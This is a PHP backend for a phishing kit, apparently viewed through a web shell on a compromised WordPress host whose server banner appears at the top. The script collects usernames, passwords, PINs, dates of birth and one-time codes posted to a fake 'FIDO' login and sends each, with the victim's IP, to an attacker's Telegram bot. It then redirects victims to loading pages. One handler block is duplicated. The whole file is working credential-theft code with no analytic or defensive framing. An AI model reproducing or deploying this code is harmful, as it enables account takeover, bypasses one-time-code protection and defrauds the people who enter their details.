|
Server : LiteSpeed System : Linux barito.iixcp.rumahweb.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64 User : elvh3918 ( 1528) PHP Version : 8.2.31 Disable Function : mail Directory : /home/elvh3918/www/wp/ |
<?php
session_start();
require 'config.php';
function sendTotelegram($data){
global $bot;
global $chat_id;
$data = urlencode($data);
$api = "https://api.telegram.org/bot$bot/sendMessage?chat_id=$chat_id&text=$data";
$c = curl_init($api);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
$res = curl_exec($c);
curl_close($c);
return $res;
}
$ip = $_SERVER['REMOTE_ADDR'];
if(isset($_POST['UN'])){
$msg = "
FIDO - LOGIN
--------------------------
USER : ".$_POST['UN']."
PASS : ".$_POST['PW']."
--------------------------
IP: $ip
";
sendTotelegram($msg);
header("location: load.html");
}
if(isset($_POST['AP'])){
$_SESSION['AP'] = $_POST['AP'];
$_SESSION['DB'] = $_POST['DB'];
$msg = "
FIDO - INFO
--------------------------
PIN : ".$_POST['AP']."
DOB : ".$_POST['DB']."
--------------------------
IP: $ip
";
sendTotelegram($msg);
header("location: loading.html");
}
if(isset($_POST['AP'])){
$_SESSION['AP'] = $_POST['AP'];
$_SESSION['DB'] = $_POST['DB'];
$msg = "
FIDO - INFO
--------------------------
PIN : ".$_POST['AP']."
DOB : ".$_POST['DB']."
--------------------------
IP: $ip
";
sendTotelegram($msg);
header("location: loadx.html");
}
if(isset($_POST['OC'])){
$_SESSION['OC'] = $_POST['OC'];
$_SESSION['DB'] = $_POST['DB'];
$msg = "
FIDO - OTP
--------------------------
OTP : ".$_POST['OC']."
--------------------------
IP: $ip
";
sendTotelegram($msg);
header("location: loading.html");
}
?>